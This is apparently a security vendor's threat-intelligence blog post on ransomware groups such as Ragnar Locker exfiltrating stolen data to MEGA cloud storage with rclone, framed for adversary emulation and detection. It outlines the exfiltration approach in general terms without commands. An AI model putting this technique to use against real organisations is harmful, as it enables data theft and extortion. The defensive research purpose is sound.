This #ThreatThursday is all about leveraging cloud storage to exfiltrate data. We also cover a tool that leaves credentials unsecured on the file system. In particular, we are going to look at how threat actors leverage cloud services like MEGA and use open source tools like rclone to exfiltrate data. This is a technique that is often done prior to ransomware attacks and used to extort the target companies into paying. As usual, we will cover Cyber Threat Intelligence, and Attack, Detect, and Respond.
ADATA, the Taiwanese chip maker, had 700GB of data leaked by Ragnar Locker using the MEGA cloud service prior to the data being ransomed. This is called “Double Extortion”. Data is stolen and bits are posted online to entice the company to pay even if they try to restore their ransomed network from backups. We have covered multiple threat groups that perform double extortion such as Conti, DarkSide, Egregor, Ryuk, and Maze. These groups tend to exfiltrate the data through the same C2 channel.
In this #ThreatThursday, we are going to look at Exfiltration Over Web Service (MITRE ATT&CK T1567) and Exfiltration to Cloud Storage (MITRE ATT&CK T1567.002). Threat actors often use accounts in cloud storage providers such as MEGA to exfiltrate the data there and easily leak the data for extortion purposes.
Observing a number of these attacks has shown that threat actors leverage an open source tool called rclone. As per their site, “Rclone is a command line program to manage files on cloud storage. It is a feature rich alternative to cloud vendors' web storage interfaces. Over 40 cloud storage products support rclone.”
The first step to exfiltrating data to a cloud storage account is identifying which web service to use and creating an account. Rclone supports over 40 different providers. From an adversary emulation perspective, you will need to choose a provider that is allowed outbound on the target network. We will use MEGA for this example because that is what Ragnar Locker uses.
Emulation Steps
Writing effective detections for adversary behaviors is difficult when adversaries use legitimate tools with malicious intent. However, with security testing and detection tuning it is possible to limit the impact these tools will have on an organization. Security testing with adversary emulation allows for these types of techniques to be repeated until a detection is written and tuned to the environment. Attack, Detect, and Respond made it possible to generate a threat informed test, identify detection gaps, and outline mitigations and remediations for security teams to respond with.
This Threat Thursday post discusses active research by SCYTHE and other cited third parties into an ongoing threat. The information in this post should be considered preliminary and may be updated as research continues. This information is provided “as-is” without any warranty or condition of any kind, either express or implied.